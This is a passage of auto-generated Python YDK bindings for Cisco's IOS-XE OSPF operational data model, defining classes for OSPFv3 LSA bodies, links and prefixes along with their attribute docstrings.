self.adv_router = None self.seq_num = None self.checksum = None self.length = None self._segment_path = lambda: "lsa-header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value) class LsaBody(Entity): """ Decoded OSPFv3 LSA body .. 
attribute:: network OSPFv3 network **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network>` **config**\: False .. attribute:: prefix OSPFv3 inter area prefix **type**\: :py:class:`Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix>` **config**\: False .. attribute:: ia_router OSPFv3 inter area router **type**\: :py:class:`IaRouter <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter>` **config**\: False .. attribute:: lsa_external OSPFv3 LSA external **type**\: :py:class:`LsaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal>` **config**\: False .. attribute:: nssa OSPFv3 NSSA **type**\: :py:class:`Nssa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa>` **config**\: False .. attribute:: link_data OSPFv3 Link data **type**\: :py:class:`LinkData <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData>` **config**\: False .. attribute:: ia_prefix OSPFv3 Intra area prefixes **type**\: :py:class:`IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix>` **config**\: False .. attribute:: lsa_flag_options LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False .. 
attribute:: lsa_body_flags LSA Body Flags **type**\: :py:class:`Ospfv3LsaBodyFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaBodyFlagOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv3-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix))]) self._leafs = OrderedDict([ ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])), ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])), ]) self.lsa_flag_options = Bits() self.lsa_body_flags = Bits() self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network() self.network.parent = self 
self._children_name_map["network"] = "network" self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix() self.prefix.parent = self self._children_name_map["prefix"] = "prefix" self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter() self.ia_router.parent = self self._children_name_map["ia_router"] = "ia-router" self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal() self.lsa_external.parent = self self._children_name_map["lsa_external"] = "lsa-external" self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa() self.nssa.parent = self self._children_name_map["nssa"] = "nssa" self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData() self.link_data.parent = self self._children_name_map["link_data"] = "link-data" self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix() self.ia_prefix.parent = self self._children_name_map["ia_prefix"] = "ia-prefix" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value) class Network(Entity): """ OSPFv3 network .. attribute:: attached_router List of the routers attached to the network **type**\: list of int **range:** 0..4294967295 **config**\: False .. 
attribute:: lsa_net_options Network LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])), ]) self.attached_router = [] self.lsa_net_options = Bits() self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value) class Prefix(Entity): """ OSPFv3 inter area prefix .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: ia_prefix Inter area Prefix **type**\: str **config**\: False .. 
attribute:: ia_prefix_options Inter area prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, self).__init__() self.yang_name = "prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])), ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])), ]) self.metric = None self.ia_prefix = None self.ia_prefix_options = None self._segment_path = lambda: "prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value) class IaRouter(Entity): """ OSPFv3 inter area router .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: destination_router_id Router ID of the router being described by the LSA **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: lsa_ia_options Inter area LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, self).__init__() self.yang_name = "ia-router" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])), ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])), ]) self.metric = None self.destination_router_id = None self.lsa_ia_options = Bits() self._segment_path = lambda: "ia-router" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value) class LsaExternal(Entity): """ OSPFv3 LSA external .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: flags LSA Flags **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags>` **config**\: False .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: external_prefix Prefix **type**\: str **config**\: False .. attribute:: external_prefix_options Prefix options **type**\: str **config**\: False .. 
attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__() self.yang_name = "lsa-external" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None 
self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): """ LSA Flags .. attribute:: e_flag When set, the metric specified is a Type 2 external metric **type**\: bool **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value) class Nssa(Entity): """ OSPFv3 NSSA .. 
attribute:: lsa_nssa_external NSSA LSA **type**\: :py:class:`LsaNssaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, self).__init__() self.yang_name = "nssa" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))]) self._leafs = OrderedDict() self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal() self.lsa_nssa_external.parent = self self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external" self._segment_path = lambda: "nssa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, [], name, value) class LsaNssaExternal(Entity): """ NSSA LSA .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: flags LSA Flags **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags>` **config**\: False .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: external_prefix Prefix **type**\: str **config**\: False .. 
attribute:: external_prefix_options Prefix options **type**\: str **config**\: False .. attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__() self.yang_name = "lsa-nssa-external" self.yang_parent_name = "nssa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), 
['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-nssa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): """ LSA Flags .. attribute:: e_flag When set, the metric specified is a Type 2 external metric **type**\: bool **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-nssa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value) class LinkData(Entity): """ OSPFv3 Link data .. attribute:: rtr_priority Router priority of the interce **type**\: int **range:** 0..255 **config**\: False .. 
attribute:: link_local_interface_address The originating router's link\-local interface address on the link **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: num_of_prefixes Number of prefixes **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_id_options Link data LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, self).__init__() self.yang_name = "link-data" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])), ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])), ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])), ]) self.rtr_priority = None self.link_local_interface_address = None self.num_of_prefixes = None self.lsa_id_options = Bits() self._segment_path = lambda: "link-data" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, 
['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value) class IaPrefix(Entity): """ OSPFv3 Intra area prefixes .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_adv_router Referenced Advertising Router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: num_of_prefixes Number of prefixes **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__() self.yang_name = "ia-prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])), ]) self.referenced_ls_type = None self.referenced_link_state_id = None self.referenced_adv_router = None self.num_of_prefixes = None self._segment_path = lambda: "ia-prefix" 
self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value) class Ospfv3Link(Entity): """ OSPFv3 links .. attribute:: interface_id (key) Interface ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: neighbor_interface_id (key) Neighbor interface ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: neighbor_router_id (key) Neighbor router ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: type Link type **type**\: int **range:** 0..255 **config**\: False .. attribute:: metric Metric **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link, self).__init__() self.yang_name = "ospfv3-link" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])), ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])), ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.interface_id = None self.neighbor_interface_id = None self.neighbor_router_id = None self.type = None self.metric = None self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + 
"[neighbor-router-id='" + str(self.neighbor_router_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value) class Ospfv3Prefix(Entity): """ OSPFv3 prefix\-list .. attribute:: prefix (key) Prefix **type**\: str **config**\: False .. attribute:: prefix_options Prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, self).__init__() self.yang_name = "ospfv3-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value) class Ospfv3IaPrefix(Entity): """ OSPFv3 intra\-area prefix\-list .. attribute:: prefix (key) Prefix **type**\: str **config**\: False .. 
